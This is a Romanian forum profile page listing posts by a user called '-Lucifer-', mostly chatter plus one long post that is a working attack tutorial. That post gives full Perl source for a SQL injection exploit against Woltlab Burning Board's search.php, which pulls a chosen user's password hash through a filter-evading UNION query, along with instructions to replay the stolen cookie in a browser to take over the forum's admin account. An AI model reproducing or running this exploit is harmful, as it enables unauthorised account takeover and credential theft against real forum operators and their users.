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Everything posted by -Lucifer-

  1. Nemessis ce vorbe grele . Welcome back.
  2. Am observat ca pe unele persoane de pe forum lear interesa asa ceva,asa ca mam documentat: Metoda 1: Computer conectat direct la modem 1. Start-Run-cmd 2. Scrieti "ipconfig /release" (fara ghilimele). 3. Scrieti "ipconfig /renew" (fara ghilimele). Metoda 2:Computer conectat direct la modem 1. Start-Run-cmd 2. Type "ipconfig /release" (fara ghilimele). 3. Shut down computer. 4. Turn off computer. 5. Turn off toate ethernet hubs/switches. 6. Turn off cable/DSL modem. 7. Lasatil off peste noapte. 8. Aprindele dimineata pe toate la loc. Metoda 3 : Network cu rooter 1. Logativa in consola adminului de la rooter. (Intrati pe browser si scrieti 2. Release IP address. 3. Turn off router, ethernet hubs/switches, si cable/DSL modem. 4. Lasatil off peste noapte. 5. Aprindele dimineata pe toate.
  3. Acest exploit functioneaza in perl.Deschideti notepad scrieti codul de mai jos si salvati nume.pl. Puneti fisierul nume.pl in C:\.Deschideti cmd (Start-Run-"cmd") si scrieti cd C:\ nume.pl (dupa fiecare rand dati enter) Dupa ce ati deschis exploitu veti primi ceva de genu examples: perl wbb.pl woltlab.de/forum/ perl wbb.pl -u 2 -i woltlab.de/de/forum/ overwrite -c and -l only when the auto-check gives you a false result use -C when you need some special cookies options : -u userid of victim [1] -i faked client-ip [] -s searchstring [board] -U userid:password or userid:pwhash [none] -p proxyip:proxyport [none] -A user-agent [firefox 1.5.09] -c cookie-prefix [auto-check] -l wbblite mode [auto-check] -C raw cookie Asta iti spunde ce trebuie sa faci in continuare: deci va trebui sa scri asta nume.pl -u 1 -i (url- aici) Va spune ceva de genu: [x] Attacking url here/search.php... [x] Checking wbb version... [x] Looks like a wbblite [x] Vulnerable check: Vulnerable [x] Unleashing black magic... [x] Looks good! [x] Userid: 1 [x] Hash: hash will be here [x] Use this cookie: cookie will be here Deschideti pagina dorita si deschideti Http Header ,dati reload (ctrl+R). Va duceti sus de tot (http header) si veti observa ca undeva scrie "Cookies". Dati "replay" si schimbati cookiurile cu unul din cele aflate adineauri in cmd dati reload (ctrl+R) si veti avea admin Exploitul #!/usr/bin/perl # Woltlab Burning Board 2.X/Lite search.php SQL Injection exploit - burned.pl # written by -Lucifer- <http://rstcenter.com> # # should work on every wbb regardless of php settings. # # v 1.2 - added 1337 sql filter evasion, version identification,better regex,raw cookie # v 1.1 - added wbblite support (thx to lama) # # Title: Woltlab Burning Board <= 1.0.2, 2.3.6 search.php SQL Injection Exploit 2 use strict; # 1337 use warnings; # 31337 use LWP::UserAgent; use HTTP::Response; use HTTP::Status; use Getopt::Std; getopt('uisUpAclC'); our ( $opt_u, $opt_i, $opt_s, $opt_U, $opt_p, $opt_A, $opt_c, $opt_l, $opt_C ); my $target = shift; sub do_request($$); if ( !$target ) { &HELP_MESSAGE; } my ( $host, $folder ); if ( $target =~ /(?:http:\/\/)?([\w\.\-\_]*)(\/.*)?/ ) { $host = $1; $folder = ( $2 ? $2 : '/' ); if ( $folder !~ /\/$/ ) { $folder .= '/'; } $target = "http://$host$folder" . 'search.php'; } else { &HELP_MESSAGE; } my $ip = ( $opt_i ? $opt_i : '' ); my $searchstring = ( $opt_s ? $opt_s : 'board' ); my ( $userid, $userpassword, $proxy, $proxyip ); ( $userid, $userpassword ) = split( ':', $opt_U ) if $opt_U; ( $proxy, $proxyip ) = split( ':', $opt_p ) if $opt_p; my $uid = ( $opt_u ? $opt_u : 1 ); my $useragent = ( $opt_A ? $opt_A : 'Mozilla/5.0 Gecko/20061206 Firefox/' ); my $prefix = ( $opt_c ? $opt_c : 'wbb2_' ); my $lite = ( $opt_l ? $opt_l : 0 ); my $isHash = 0; print "burned.pl written by trew\n"; print "report errors \@ trew\@safe-mail.net.. thx\n"; print "[x] Attacking $target...\n"; if ( $userpassword and $userpassword =~ /([a-f0-9]{32})/ ) { $isHash = 1; } if ( !$lite ) { print "[x] Checking wbb version...\n"; if ( do_request( '', 'editor.jar' ) =~ /404 Not Found/ ) { print "[x] Looks like a wbblite\n"; $prefix = "" if ( !$opt_c ); $lite = 1; } else { print "[x] Looks like a normal wbb\n"; } } if ( !$lite ) { if ( !$opt_c ) { my $headers = do_request( '', '' ); if ( $headers =~ /Set-Cookie: (.*?)cookiehash/ ) { $prefix = $1; } else { print $headers} } print "[x] Cookie prefix: $prefix\n"; } print "[x] Vulnerable check:"; my $answer; my $pre; $answer = do_request( '\'', '' ); if ( $answer =~ /FROM (.*?)_boards/ ) { $pre = $1; print " Vulnerable\n"; } elsif ($answer =~ /Die Suche ergab keine/ or $answer =~ /No results were found for this search/ or $answer =~ /Your search is invalid/ or $answer =~ /Ihre Suchabfrage ist/ ) { print " No Idea\n"; print "[x] Searchstring was not found, try a different one with -s\n"; exit; } elsif ($answer =~ /Ihnen wird der Zutritt zu dieser Seite/ or $answer =~ /Access denied/ ) { print " No Idea\n"; print "[x] search.php only for users,"; print " wrong userdetails or wrong cookie-prefix!\n" if $opt_U; print " give me userid+password with -U\n" if !$opt_U; exit; } else { print " Not Vulnerable!\n"; #print $answer; exit; } print "[x] Unleashing black magic...\n"; $answer = do_request( ' UNION/*s12s*/ SELECT/*t35s*/ password , password /*er35*/ FRoM ' . $pre . '_users WHeRE/*esr35*/ userid=' . $uid . '/*', '' ); if ( $answer =~ /${folder}search.php/ and $answer =~ /([a-f0-9]{32})/ ) { print "[x] Looks good!\n"; print "[x] Userid: $uid\n"; print "[x] Hash: $1\n"; if ( !$opt_C ) { print "[x] Use this Cookie:\n ${prefix}userid=$uid;${prefix}userpassword=$1\n"; } } else { print "[x] Looks bad!\n"; print $answer; } sub HELP_MESSAGE() { print "burned.pl written by trew\n" . "perl $0 [options] url\n" . "examples:\n" . "perl $0 woltlab.de/forum/\n" . "perl $0 -u 2 -i woltlab.de/de/forum/\n" . "overwrite -c and -l only when the auto-check " . "gives you a false result\n" . "use -C when you need some special cookies\n" . "options :\n-u userid of victim [1]\n" . "-i faked client-ip []\n" . "-s searchstring [board]\n" . "-U userid:password or userid:pwhash [none]\n" . "-p proxyip:proxyport [none]\n" . "-A user-agent [firefox 1.5.09]\n" . "-c cookie-prefix [auto-check]\n" . "-l wbblite mode [auto-check]\n" . "-C raw cookie\n"; exit; } sub do_request($$) { my $string = shift; my $otherurl = shift; if ($otherurl) { $target = "http://$host$folder" . $otherurl; } else { $target = "http://$host$folder" . 'search.php' } $string = '/*' if ( !$string ); my $ua = LWP::UserAgent->new; if ($proxy) { $ua->proxy( 'http', "http://$proxy:$proxyip/" ); } my $request = new HTTP::Request( 'POST', $target ); $request->content( 'boardids%5B0%5D=1&boardids%5B1%5D=2,3,4)' . $string . '&send=1&searchstring=' . $searchstring ); $request->content_type('application/x-www-form-urlencoded'); $request->header( 'User-Agent' => $useragent ); if ($opt_U) { my $userhash; if ( !$isHash ) { $userhash = md5($userpassword); } else { $userhash = $userpassword; } my $cookie = $prefix . 'userid=' . $userid . ';' . $prefix . 'userpassword=' . $userhash; $request->header( 'Cookie' => $cookie ); } elsif ($opt_C) { $request->header( 'Cookie' => $opt_C ); } $request->header( 'Client-Ip' => $ip ); my $response = $ua->request($request); my $body = $response->content; my $headers = $response->headers_as_string; $body = $response->error_as_HTML if ( $response->is_error ); return $headers if ( $string eq '/*' and !$response->is_error ); return $body; } # MD5 Code ripped from Libwhisker for bigger portability # thx rfp Smile { my ( @S, @T, @M ); my $code = ''; sub md5 { return undef if ( !defined $_[0] ); # oops, forgot the data my $DATA = _md5_pad( $_[0] ); &_md5_init() if ( !defined $M[0] ); return _md5_perl_generated( \$DATA ); } sub _md5_init { return if ( defined $S[0] ); my $i; for ( $i = 1 ; $i <= 64 ; $i++ ) { $T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) ); } my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 ); for ( $i = 0 ; $i < 64 ; $i++ ) { $S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ]; } @M = ( 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 1, 6, 11, 0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12, 5, 8, 11, 14, 1, 4, 7, 10, 13, 0, 3, 6, 9, 12, 15, 2, 0, 7, 14, 5, 12, 3, 10, 1, 8, 15, 6, 13, 4, 11, 2, 9 ); &_md5_generate(); my $TEST = _md5_pad('foobar'); if ( _md5_perl_generated( \$TEST ) ne '3858f62230ac3c915f300c664312c63f' ) { die('Error: MD5 self-test not successful.'); } } sub _md5_pad { my $l = length( my $msg = shift() . chr(128) ); $msg .= "\0" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 ); $l = ( $l - 1 ) * 8; $msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 ); return $msg; } sub _md5_generate { my $N = 'abcddabccdabbcda'; my ( $i, $M ) = ( 0, '' ); $M = '&0xffffffff' if ( ( 1 << 16 ) << 16 ); # mask for 64bit systems $code = <<EOT; sub _md5_perl_generated { BEGIN { \$^H |= 1; }; # use integer my (\$A,\$B,\$C,\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476); my (\$a,\$b,\$c,\$d,\$t,\$i); my \$dr=shift; my \$l=length(\$\$dr); for my \$L (0 .. ((\$l/64)-1) ) { my \@D = unpack('V16', substr(\$\$dr, \$L*64,64)); (\$a,\$b,\$c,\$d)=(\$A,\$B,\$C,\$D); EOT for ( $i = 0 ; $i < 16 ; $i++ ) { my ( $a, $b, $c, $d ) = split( '', substr( $N, ( $i % 4 ) * 4, 4 ) ); $code .= "\$t=((\$$d^(\$$b\&(\$$c^\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n"; $code .= "\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$$M;\n"; } for ( ; $i < 32 ; $i++ ) { my ( $a, $b, $c, $d ) = split( '', substr( $N, ( $i % 4 ) * 4, 4 ) ); $code .= "\$t=((\$$c^(\$$d\&(\$$b^\$$c)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n"; $code .= "\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$$M;\n"; } for ( ; $i < 48 ; $i++ ) { my ( $a, $b, $c, $d ) = split( '', substr( $N, ( $i % 4 ) * 4, 4 ) ); $code .= "\$t=((\$$b^\$$c^\$$d)+\$$a+\$D[$M[$i]]+$T[$i])$M;\n"; $code .= "\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$$M;\n"; } for ( ; $i < 64 ; $i++ ) { my ( $a, $b, $c, $d ) = split( '', substr( $N, ( $i % 4 ) * 4, 4 ) ); $code .= "\$t=((\$$c^(\$$b|(~\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n"; $code .= "\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$$M;\n"; } $code .= <<EOT; \$A=\$A+\$a\&0xffffffff; \$B=\$B+\$b\&0xffffffff; \$C=\$C+\$c\&0xffffffff; \$D=\$D+\$d\&0xffffffff; } # for return unpack('H*', pack('V4',\$A,\$B,\$C,\$D)); } EOT eval "$code"; } } # md5 package container Acest tutorial este explicat mai ca la "prosti",sper sa va descurcati. Acest tutorial este folosit pentru obtinerea "Panoului de Admin" .
  4. naspa,si bunica poate face mai bine
  5. :shock: Ce legatura au acestea cu webdesingul? Hai nu ma inebuni poate leai facut in 3DS MAX
  6. muhahahha ,foarte tare=))
  7. cam slabut,vorba lui CODEX se putea si mai bine. Am sa incerc si eu sa fac un header pentru RST .:oops:
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